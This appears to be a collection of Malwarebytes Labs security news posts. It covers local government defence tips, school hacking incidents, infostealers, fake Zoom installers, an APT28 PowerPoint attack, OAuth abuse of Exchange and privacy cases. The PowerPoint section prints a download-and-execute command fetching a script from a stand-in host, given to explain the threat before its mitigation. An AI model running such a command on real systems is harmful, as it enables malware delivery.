IT NEWS

It seems like not a day goes by where we don’t hear about a local government cyberattack. Indeed, from 911 call centers to public schools, cyberattacks on local governments are as common as they are devastating. 

Just how often do threat actors attack local governments? A survey of 14 mainly larger US local governments found that just over half of respondents said they suffer attacks constantly, more than a quarter said hourly, and 14.3% said daily. 

Local governments continue to be a common cyberattack target for two big reasons. The first is that they handle troves of sensitive data, especially personally identifiable information (PII), and the second is that they operate on shoestring budgets with little to no cybersecurity staff or leadership buy-in. 

Now, factor in these two reasons with the sheer number of local governments out there in the United States—90,075 units—and you have a huge, vulnerable, and valuable target. Sounds like easy pickings for attackers, but it doesn’t have to be. 

With a few best practices, local governments can improve their cybersecurity posture and make it less likely that threat actors attack their systems. We’ll break down five best practices for local government cybersecurity in this post.

Table of Contents

1. Take cybersecurity assessments to find and address weaknesses

2. Adopt the fundamentals

3. Partner up!

4. Build a playbook for ransomware response and recovery

5. Consider outsourcing

1. Take cybersecurity assessments to find and address weaknesses

Cybersecurity consultants and the professional literature agree: You should adopt cybersecurity policies such as the NIST Framework to help prevent and respond to attacks. And a key part of building out any cybersecurity policy for your local government is to develop an organizational understanding of risk to systems, people, data, and so on. 

There are tons of free cybersecurity assessments for Federal, State, Local, Tribal and Territorial (SLTT) governments that you can take to get started. After performing the assessments, you can compare your results to the criteria of NIST to identify gaps, as well as deficiencies to be improved.

1. Cyber Infrastructure Survey (CIS): A free assessment of essential cybersecurity practices in-place for critical services. Also conducted by the DHS.
2. Cyber Resilience Review (CRR): The CRR assessment evaluates your organization’s operational resilience and cybersecurity practices. Conducted free of charge by the US Department of Homeland Security (DHS)
3. Phishing Campaign Assessment (PCA): Evaluates an organization’s susceptibility and reaction to phishing emails. Conducted free of charge by the National Cybersecurity Assessments and Technical Services (NCATS) team.
4. Cybersecurity Evaluation Tool (CSET®): A stand-alone desktop application that guides asset owners evaluate their cybersecurity posture against recognized standards. Also delivered free of charge by the NCATS team.
5. Risk and Vulnerability Assessment (RVA) One-on-one engagement to give organizations an actionable risk analysis report containing remediation recommendations prioritized by severity and risk.

2. Adopt the fundamentals  

The unfortunate reality is that an inability to pay competitive salaries, insufficient number of staff, and lack of funds are big barriers to local government cybersecurity. However, there’s still plenty of important cybersecurity fundamentals that local governments should try to adopt to the fullest extent possible. 

Take cyber insurance, for example. Cyber insurance can prevent local governments from having to pay huge out of pocket costs in the event that they’re hit with a cyberattack. Baltimore learned this the hard way. 

(An important caveat here is that cyber insurance is becoming increasingly expensive: check out our article on 4 ways to save money on cyber insurance).

Cybersecurity best practices don’t just help you stay safe—they can also make you eligible for grant funding. In particular, local governments looking to be eligible for the State and Local Cybersecurity Grant Program must include these best practices in their cybersecurity plan:

1. Multi-factor authentication (MFA)
2. Enhanced logging
3. Data encryption for data at rest and in transit
4. End use of unsupported/end of life software and hardware that are accessible from the Internet 
5. Prohibit use of known/fixed/default passwords and credentials 

In addition, only 23% of local governments have adopted the .gov domain, meaning a majority of local governments are missing out on one of the simplest ways to strengthen their cybersecurity posture. Sponsored by CISA, the Cybersecurity and Infrastructure Security Agency, the .gov domain comes with several key security benefits:

• MFA is enforced on all accounts in the .gov registrar, and user accounts cannot use passwords that have been found in known data breaches.
• It ‘preloads’ all new domains, which lets web browsers know to always use HTTPS to connect with any website on that domain.
• CISA, GSA, and the National Institute of Standards and Technology (NIST) help monitor for issues in the namespace

To obtain a .gov domain or to learn more, check out some of the resources below. 

• https://home.dotgov.gov/registration. 

• https://home.dotgov.gov/registration/requirements/ 

• https://home.dotgov.gov/help/ 

3. Partner up!

Local governments may be resource-constrained, but the good news is that they don’t have to face cybersecurity alone. State governments, together with Federal, university, and even nonprofit partners, can be strong allies to local government cybersecurity.

• Federal partners: Local governments are encouraged to report cyber incidents to a federal entity so they can receive relevant asset response, threat response, and threat intelligence services. Partnering with your local fusion center is a good idea as well.

• State partners: The level of state-local cybersecurity support will vary by state, but can include assessments, exercises, and consulting services. In Michigan’s Cyber Partners Program, for example, local communities receive services from a CISO-level consultant.

• University partners: Partnering with universities can help local governments get access to talent, technological insights, even real-time network security monitoring.

• Nonprofit partners: Local governments involved with the Multi-State Information Sharing & Analysis Center (MS-ISAC) get free resources for cyber threat prevention, protection, response, and recovery.

4. Build a playbook for ransomware response and recovery 

For local governments especially, a ransomware attack is a matter of ‘when’ and not ‘if’. However, they might not have the budget or staff to implement and use anti-ransomware solutions such as Endpoint Detection and Response (EDR).

Fortunately, you don’t need any fancy technology to start building a solid ransomware response and recovery plan. NIST recommends that organizations follow these steps to accelerate their recovery, among others: 

• Develop an incident recovery plan: Establish a plan that has a Cyber Incident Response Team (CIRT) with clearly identified roles, responsibilities, and contacts ahead of time, then regularly exercise that plan.

• Data backup and restoration strategy: Backups are a prime target for attackers, so keep multiple copies of your data, and make sure at least one of them is online.

• Know who you’re going to contact: Maintain an up-to-date list of internal and external stakeholders to contact in the event of an attack, which may include senior management, PR, your legal team, insurance providers, vendors, and law enforcement.

In our Ransomware Emergency Kit, you’ll find more resources your local government needs to understand threats, prevent attacks, and defend against cybercriminals.

5. Consider outsourcing

Though CISOs might be wary about having their data handled by an outside organization, many local governments rely on vendors and managed service providers (MSPs) to provide some or all of their cybersecurity operations. 

A 2020 survey of 165 municipalities found 50.9% outsourced some of their cybersecurity functions, with almost 60% citing “Lack of local skilled professionals” as a reason for outsourcing. Some of functions commonly outsourced are:

• All cybersecurity needs

• 24/7 monitoring of cyber threats

• 24/7 monitoring of Intrusion Prevention System (IPS)

• Incident response 

• Network monitoring 

• Employee security awareness training

“By working with a trusted partner or service provider, local governments can fast track to get their security stack up to par,” said David Pier, Team Lead, Corporate Solutions Engineering at Malwarebytes. “Many frameworks and security plans can take upwards of multiple years to successfully implement and audit for certification. If they can pass this work along to their partners, it circumvents the need for them to commit to a lengthy process in addition to the complexity of implementation.”

Read “Risk Considerations for Managed Service Provider Customers” from CISA for more information for local governments choosing an MSP.

Related: 

Cyber threat hunting for SMBs: How MDR can help

EDR vs MDR vs XDR – What’s the Difference?

Enhancing local government cybersecurity

A lack of funding and staff makes local government cybersecurity tough, period. 

However, if every local government implemented these five best cybersecurity practices today, they could dramatically lessen the likelihood and fallout of an attack—and increase eligibility for the State and Local Cybersecurity Grant Program while they’re at it.

Malwarebytes has ample experience providing local governments and public schools with effective, intuitive, and inclusive cyberprotection. Read the case studies below to learn more:

• City of Vidalia gains a ransomware and vulnerability-free zone
• University of Illinois turns to Malwarebytes in the search for an endpoint remediation solution
• Shaker Heights Schools uses Malwarebytes to help remediate ransomware infection

Check out our government case studies and education pages for more information.

For many students school can be a tough time, and we’ve all heard stories about bored or frustrated kids compromising school cybersecurity to change grades. Sometimes the students are celebrated, and other times it ends in them being expelled from school, or even prosecuted. 

Of course, these acts of compromising school security are against the law. In 1986, the Computer Fraud and Abuse Act (CFAA) was enacted as an amendment to the first federal computer fraud law, to address hacking. The CFAA prohibits intentionally accessing a computer without authorization or in excess of authorization.

And the sentences are not mild. Accessing a computer to defraud and obtain value (such as raising your grades) could end in a five-year prison sentence!

Here are four times school cybersecurity failed, and students got up to no good:

1. Rickrolling an entire school district

A student at a high school in Cook County successfully hacked into the Internet-of-Things (IoT) devices of one of the largest school districts in Illinois, and gave everyone a surprise.

In a personal blog the student wrote:

“I did it by hijacking every networked display in every school to broadcast ‘Never Gonna Give You Up’ in perfect synchronization. Whether it was a TV in a hall, a projector in a classroom, or a jumbotron displaying the lunch menu, as long as it was networked, I hacked it!”

Now, that is high-level rickrolling! And he was lucky enough to find an understanding audience. The director stated that because of its guidelines and documentation, the district would not be pursuing discipline. In fact, they thanked the rickroller for their findings and asked them to present a debrief to the tech team.

2. Guilty until proven innocent

A Canadian student at Tufts University veterinarian school was expelled for an elaborate months-long scheme involving stealing and using university logins to break into the student records system, view answers, and alter her own and other students’ grades.

Since her visa was no longer valid after she got expelled, she had to leave the US immediately. With tens of thousands of dollars in student debt and no prospect of her becoming a veterinarian, her life was in shambles. 

She provided Tufts with information about her whereabouts at the times of the alleged hacks, but her alibis were dismissed. She scanned her MacBook Air—the source of the alleged hacks—and that showed that it was itself compromised. Within minutes, several malicious files were found, chief among which were two remote access trojans (RATs).

Like any private university, Tufts can discipline and expel a student for almost any reason. So they did not have to prove she was guilty, she had to prove without any reasonable doubt that she was innocent, and she was unable to convince them.

3. 12-year-olds pwn their school district

The hack started small, in seventh grade, when the students bypassed their middle school’s internet filters to watch YouTube during lunch. But by the time Jeremy Currier and Seth Stephens were caught more than two years later, their exploits had given them extraordinary reach into the computer network of the Rochester Community Schools. They literally had access to everything. The boys were even using district servers to mine for cryptocurrency.

As a consequence, the district expelled both of them, then referred them to the county sheriff’s office. Their long-term employment prospects should have been bright, with many organizations looking for skilled cybersecurity workers. Sadly, the boys are unlikely to be eligible for many of those public-sector positions as it’s now unlikely they will be able to pass a background check and get security clearance.

4. Homecoming queen rigs contest, allegedly

When Emily Grover was named homecoming queen, her school accused her and her vice principle mother of hacking students’ accounts to sway the election.

The pair allegedly used the mother’s login to the school computer system to harvest student IDs and birthdates. These were then used to cast 246 fake votes on Election Runner—a third-party app used by the school to run the election—from the mother’s cell phone and a computer at her home.

The duo claim to be innocent and refused a no-jail plea agreement, despite facing a maximum penalty of 16 years in jail.

Grover was forbidden from graduating with her class and received a letter from the University of Western Florida saying she was no longer welcome there.

The crime and the consequences

One thing all these cases have in common is basic security lapses at the educational institutions involved: Plaintext passwords in log files, passwords on sticky notes, and wide open networks.

But even if the door is left open, it is still illegal to enter.

Should you find such an open door, warn your IT staff about it and don’t take advantage of it. Getting caught could do a lot more damage than a bad grade or only being the runner-up in a homecoming queen contest.

There’s a new slice of malware-as-a-service doing the rounds, although its actual newness is somewhat contested. The stealer, called Erbium, was first spotted on forums back in July 2022, but it seems nobody is quite sure when it started being deployed and snagging victims. Nevertheless, it is now happily causing chaos for victims as it looks to steal a sizeable portion of data from infected machines.

A slick tool with its own fully functional dashboard, its sights are set on targets not entirely dissimilar to other data stealers. System data collection, drive enumeration, and loading processes and DLLs into memory are all tell-tale signs that bad things are afoot on the target computer.

Erbium targets multiple forms of cryptocurrency wallet, along with password managing software and two-factor authentication (2FA) data. Connections are made to Discord’s Content Delivery Network in order to potentially download more malware. According to the latest research available, it leans into that well worn tactic of plundering several forms of web browser for passwords, autofill data, and also cookies. Browsers listed include Firefox, Chrome, Pale Moon, and even email client Thunderbird gets a mention.

In fact, many of the cryptocurrency wallets targeted are browser extensions. According to Bleeping Computer, this includes iWallet, Clover Wallet, Steem Keychain, ZilPay and many more. Several cold wallets are also in the malware’s crosshairs, and to top it all off it does of course have the ability to take screenshots of the victim’s desktop.

The most recent campaign described by researchers uses well worn tricks which never seem to go out of fashion. Specifically: Malware stored on free file hosting, posing as cheats or cracks. Using free file hosting for malware storage makes it easy for its operators to set up shop somewhere else, should the malware be taken down by the hosts.

The attackers are said to make use of drive-by download techniques to spread the files—a term that covers all forms of unintended software installation, such as software installed via browser exploits, or bundled with legitimate downloads. There are no more specifics, but outside of this campaign, it is very common to see these sorts of files promoted on fake Youtube videos or even in the comments under legitimate videos.

Once enough data is gathered by the malware authors, it’s off to the underground marketplaces to trade and / or sell the stolen information. Erbium has become very popular in recent months, with Bleeping Computer reporting the cost of doing business has risen from $9 per week to $100 per month.

Competition is fierce in malware-as-a-service land, but Erbium seems to be sticking around.

Users of Malwarebytes are protected from the two payloads mentioned in the Duskrise article [1], [2], and the various payloads [1], [2] listed in the Cyfirma writeup.

Stay safe out there!

Zoom video call software continues to be a staple in work environments. Despite a slow, post-lockdown easing back to the “old normal,” many businesses still have remote workers, or people working in different geographies. It’s no surprise then to see criminals continuing to abuse Zoom’s popularity, in the hope of netting interested parties and, potentially, luring current users into downloading and installing malware.

This particular campaign, initially discovered by an Internet researcher going by the handle @idclickthat, gets unsuspecting users to download an information-stealer—spyware, if you prefer—from fake sites hosting malformed Zoom installers (malware bundled with a legitimate Zoom installer) onto their work systems.

Malware @Zoom downloads ?

/zoom-download.host
/zoom-download.space
/zoom-download.fun
/zoomus.host
/zoomus.tech
/zoomus.website
PDRhttps://t.co/7NJ4fEJ9Su@ULTRAFRAUD @malwrhunterteam @JAMESWT_MHT @illegalFawn @nullcookies @AlvieriD @BumbledBubble @ActorExpose pic.twitter.com/JYq2UJEMQ7

— idclickthat (@idclickthat) September 12, 2022

Further analysis from researchers at Cyble reveals this spyware is known as the Vidar Stealer, which it did a deep-dive on last year. Vidar steals user credentials, banking information, saved passwords, IP addresses, and other sensitive information. Findings reveal six fake Zoom download sites, but they are no longer accessible. According to idClickThat, the only difference between the home page of the fake Zoom download sites and the real one is the addition of a “download” button in the main image.

It isn’t clear how users encountered these fake download sites, but those that did downloaded a file called Zoom.exe. Once executed, it dropped two payloads: The legitimate software installer and malware named Decoder.exe, which then dropped Vidar malware. This spyware was then injected into MSBuild.exe, a platform used to build applications.

Once injected, Vidar extracted a command-and-control IP addresses from two profiles created on Telegram and ieji.de, an anonymous social platform based on an instance of Mastodon. These URLs, per Cyble researchers, house DLL files and configuration data the spyware needs to function.

Note that information stealers like Vidar can harvest credentials that put your business network at risk. Threat actors can sell this access to the highest bidders, who can use it to break into your company network, steal information and plant ransomware.

So, before downloading files that claim to be legitimate, it pays to do a quick online search for the software’s official website. Of course it also pays to have good security software that blocks malware, so that accidents can be stopped before they turn into a problem for your computer and your employer’s network.

Stay safe!

Researchers at Cluster25 have published research about exploit code that’s triggered when a user moves their mouse over a link in a booby-trapped PowerPoint presentation.

The code starts a PowerShell script that downloads and executes a dropper for Graphite malware.

Graphite is named after Microsoft’s Graph API, which it uses to access command and control (C2) resources on Microsoft OneDrive. This type of communication allows the malware to avoid detection for longer, because it only connects to legitimate Microsoft domains.

The attack was attributed to the Russian APT28 group, also known as Sofacy or Fancy Bear, a notorious Russian threat actor that has been active since at least 2004. Its main activity is collecting intelligence for the Russian government. The group is known to have targeted US politicians, organizations, and even nuclear facilities.

Cluster25 indicates that entities and individuals in the defense and government sectors of European countries may have been the potential targets of this campaign. But, as we always say, attribution is hard, and thinking you aren’t a target isn’t a good defense strategy.

Malicious mouseover

The technique used in this attack does not require macros to be enabled. It uses the Windows native SyncAppvPublishingServer utility, which is triggered by simply hovering over a hyperlink.

Basically, hovering over a mouse can be used to trigger:

SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://example.org/malice.ps1') | IEX"

Which downloads a script—malice.ps1 in my example—which can be used to execute malicious code on the affected system.

In the example discovered by Cluster25, the malicious link triggered a PowerShell script that downloaded a DLL file from OneDrive, disguised with a .jpeg extension. The file was later decrypted and written to the local path C:ProgramDatalmapi2.dll. The script also added a registry key to execute the DLL via rundll32.exe for persistence.

The victim does not need administrator access to trigger a successful attack. This technique is by no means new—it was spotted spreading malware five years ago, in 2017.

Mitigation

SyncAppvPublishingServer has no business running unless the Application Virtualization (App-V) for Windows client is active on the system. App-V delivers Win32 applications to users as virtual applications, which are installed on centrally managed servers and delivered as a service in real time, on an as-needed basis. Users launch and interact with virtual applications as if they are installed locally.

So, unless you are using this functionality, it is safe to block SyncAppvPublishingServer.exe. Also, Microsoft Office’s Protected View should stop the code from executing. Protected View is enabled by default and should not be disabled. You can check this by opening an Office file and clicking on File > Options, then Trust Center > Trust Center Settings > Protected View to view the active settings.

Malwarebytes

Malwarebytes users are protected against this attack.

Our web protection module blocks the One Drive URLs and our Real-time Protection module detects lmapi2.dll as Trojan.Downloader.

Microsoft has published a security blog about an investigation into an attack in which threat actors used malicious OAuth applications to abuse Exchange servers for their spam campaign.

The threat actor behind this attack has been active for many years, and has been running spam campaigns using various methods that provided them with high volume spamming opportunities.

Credential stuffing

As Microsoft notes, in the initial stage of the attack the threat actor launched credential stuffing attacks against high-risk accounts that were not protected by multi-factor authentication (MFA). Once in, the threat actor was able to gain access to administrator accounts. The authentication attempts were launched against the Azure Active Directory PowerShell application which was later used to deploy the rest of the attack.

OAuth application

The threat actor then proceeded to set up the malicious OAuth application. OAuth enables apps to obtain limited access to a user’s data without giving away a user’s password. The threat actor registered a new OAuth application and granted it global admin and Exchange admin roles.

The threat actor added their own credentials to the OAuth application, enabling them to access the application even if the owner of the compromised account changed their password.

Changing Exchange settings

The threat actor then used the privileged application to authenticate the Exchange Online PowerShell module and modify the Exchange settings of the compromised server.

One modification was to create a new inbound connector. Connectors are a collection of instructions that customize the way email flows to and from organizations using Microsoft 365 or Office 365. The threat actor set up a new connector that allowed mails from certain IPs related to the attacker’s infrastructure to flow through the victim’s Exchange server. This enabled them to send emails that looked like they came from the compromised Exchange domain.

Transport rules

Transport rules, aka mail flow rules, are sets of actions that can be performed on any mail that flows in the organization. The threat actor used this feature to delete specific headers from every mail that flowed in the organization. By deleting these headers, the attacker tried to prevent security products or email providers from detecting or blocking their emails.

Usage

This flow of preparations gave the threat actor all they needed to send out a spam campaign. Microsoft observed that the threat actor did not always use the application right after it was deployed. In some cases, it took weeks or months before the application was utilized.

After each spam campaign, the actor deleted the malicious inbound connector and transport rules to prevent detection, but they kept the application which could be used to prepare the next part of the attack. In some cases, the app remained dormant for months before it was reused by the threat actor.

Motive

The threat actor has been active in high volume spam campaigns for years. In this case, the objective was to send out sweepstakes spam emails designed to trick recipients into providing credit card details and signing up for recurring subscriptions under the guise of winning a valuable prize.

Image courtesy of Microsoft

As an extra precaution, the threat actor used cloud-based outbound email infrastructure like Amazon SES and Mail Chimp, both of which are routinely used for marketing and other legitimate purposes.

Mitigation

• As always, use MFA protection for all accounts, especially important administrator ones.
• Limit the amount of login trials, for example by implementing a timeout after a few failed login attempts.
• Implement conditional access policies that check the login attempt against other conditions like the originating IP address or device, which can flag unusual tries.

CISA (the Cybersecurity and Infrastructure Security Agency) recently added CVE-2022-35405—a remote code execution(RCE) vulnerability affecting Zoho ManageEngine PAM360 (versions 5500 and earlier), Password Manager Pro (versions 12100 and earlier), and Access Manager Plus (versions 4302 and earlier)—to its Known Exploited Vulnerabilities (KEV) Catalog, a list of known CVEs that carry significant risk to the federal enterprise. Doing this forces all Federal Civilian Executive Branch Agencies (FCEB) to patch this bug.

According to BleepingComputer, federal agencies that may be affected by CVE-2022-35405 have until October 13 to ensure they’re patched and their networks are protected from attacks leveraging this vulnerability.

CVE-2022-35405 is a critical vulnerability. When exploited, attackers can execute potentially malicious code on affected installations of ManageEngine software—without authentication for Password Manager Pro and PAM360, and with authentication for Access Manager Plus.

Researcher Vinicius Pereira first flagged this vulnerability in June 2022. Since then, several PoCs (proofs-of-concepts) and a Metasploit module for it have been made public.

ManageEngine “strongly recommends” that its clients upgrade their affected software as soon as possible. The company pointed to the following locations where customers can download updates:

• Access Manager Plus – https://www.manageengine.com/privileged-session-management/upgradepack.html
• PAM360 – https://www.manageengine.com/privileged-access-management/upgradepack.html
• Password Manager Pro – https://www.manageengine.com/products/passwordmanagerpro/upgradepack.html

While private organizations don’t have a ruling requiring them to patch noteworthy flaws, CISA still urges them to patch as soon as they can.

TikTok is no stranger to controversy where data usage is concerned. Back in 2021, the social media dance extravaganza platform agreed to pay $92m to settle dozens of lawsuits alleging harvesting of personal data. There has also been concern with regard to whether or not settings were enough to keep children safe, leading to significant alterations to how those accounts are managed.

Unfortunately for TikTok, it’s back in the news again, and not in a good way. TikTok could be headed for a $28.91m fine, courtesy of the United Kingdom. The fine, related to how children are safeguarded on the app, is the result of a possible breach of the UK’s data protection laws.

The provisional findings of the ICO

The Information Commissioner’s Office (ICO) has issued a statement, which refers to TikTok potentially breaching UK data protection law between May 2018 and July 2020. The statement explains that the ICO has issued TikTok with a notice of intent, which is a legal document which may precede a legal fine.

The ICO claims TikTok may have:

• Processed the data of children under the age of 13 without appropriate parental consent;

• Failed to provide proper information to its users in a concise, transparent and easily understood way; and

• Processed special category data, without legal grounds to do so.

The statement notes that these findings are “provisional”, and that no conclusions should be drawn at this stage around whether “there has, in fact, been any breach of data protection law or that a financial penalty will ultimately be imposed. We will carefully consider any representations from TikTok before taking a final decision”.

In other words: all of these claims and statements come with a rather large “allegedly” tag applied, and TikTok will make a response to these concerns before anything else happens of a legal nature.

TikTok isn’t currently commenting, citing “confidentiality” which makes sense given the intent to formally respond to the ICOs findings.

Tackling the child data problem

This appears to be part of a much bigger drive to ensure children’s data is used safely and correctly by online services. According to the Guardian, The ICO Information Commissioner stated that the ICO is looking at “more than 50” online services to check for child-centric data compliance.

There’s a big push for child safety at the moment, especially with regard to making sure businesses are complying with regulations. Some of these drives are perhaps a little bit controversial, too. For the time being, you can certainly take some action yourself and help your child become a little bit more cyber-savvy in their social media dealings. Check out our articles on helping your child to manage their online reputation, and our five tips for keeping kids safe on social media platforms.

Last week, two Facebook users filed a class-action complaint against Meta in San Francisco’s federal court, alleging the company built a “secret workaround” to Apple’s safeguards that protect iPhone users from tracking. Facebook circumvents Apple’s privacy rules by opening in-app browsers within its apps instead of the iPhone’s default browser. By doing this, the users further allege Meta violated state and federal laws regarding the unauthorized collection of personal data.

The suit came after Felix Krause (@KrauseFx), a data privacy researcher and former Google engineer, released a report in August 2022 about iOS privacy, featuring a tool he created himself called the InAppBrowser. It can check if an in-app browser injects JavaScript (JS) code, which could be problematic for iOS and Android users as this causes potential security and privacy risks to users.

In the case of Meta, this JS code is Meta Pixel.

“The iOS Instagram and Facebook app render all third party links and ads within their app using a custom in-app browser,” said Krause in his blog. “This causes various risks for the user, with the host app being able to track every single interaction with external websites, from all form inputs like passwords and addresses, to every single tap.”

Krause also included the following caveat: “Important: Just because an app injects JavaScript into external websites, doesn’t mean the app is doing anything malicious. There is no way for us to know the full details on what kind of data each in-app browser collects, or how or if the data is being transferred or used.”

In an email interview with Bloomberg, a spokesperson from Meta said that Krause’s allegations are “without merit” and it will defend itself.

“We have designed our in-app browser to respect users’ privacy choices, including how data may be used for ads,” the email statement said.

In February, Meta admitted that Apple’s App Tracking Transparency (ATT) feature would decrease its ad revenue by $10B. This admission, according to CNBC, is “the most concrete data point so far on the impact to the advertising industry” in terms of Apple’s privacy feature, which limits companies from accessing the data of iPhone users.

“This allows Meta to intercept, monitor, and record its users’ interactions and communications with third parties, providing data to Meta that it aggregates, analyzes, and uses to boost its advertising revenue,” the suit reads.

Facebook and Instagram weren’t the only apps mentioned in Krause’s report. TikTok, Snapchat, and Amazon were also mentioned.

Last week on Malwarebytes Labs:

• Hookup site targeted by typo-squatters
• American Airlines suffers data breach after phishing incident
• Grand Theft Auto 6 suffers grand theft
• EDR vs MDR vs XDR – What’s the Difference?
• Scammers send fake ‘Energy Bills Support Scheme’ texts
• Tax refund phish logs keystrokes to swipe personal details
• Kiwi Farms breached, user data potentially exposed
• 5 things to teach your kids about social media
• Vulnerable children’s identities used in tax fraud scheme
• 2K games helpdesk abused to spread RedLine malware
• Morgan Stanley’s years-long “extensive failure” to protect customer data ends in huge fine
• Welcome to high tech hacking in 2022: Annoying users until they say “yes”
• Update Firefox and Thunderbird now! Mozilla patches several high risk vulnerabilities
• Medtronic’s MiniMed 600 series insulin pumps potentially at risk of compromise, says FDA
• A first look at the builder for LockBit 3.0 Black
• Malwarebytes recognized as endpoint security leader by G2

Stay safe!